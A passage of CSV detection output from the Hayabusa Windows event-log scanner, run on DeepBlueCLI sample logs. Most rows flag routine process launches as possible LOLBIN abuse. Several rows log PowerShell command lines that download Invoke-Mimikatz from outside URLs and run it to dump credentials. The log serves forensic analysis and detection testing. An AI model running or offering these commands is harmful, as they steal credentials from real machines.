+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:31:56.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:28:51.611 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:21:09.562 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 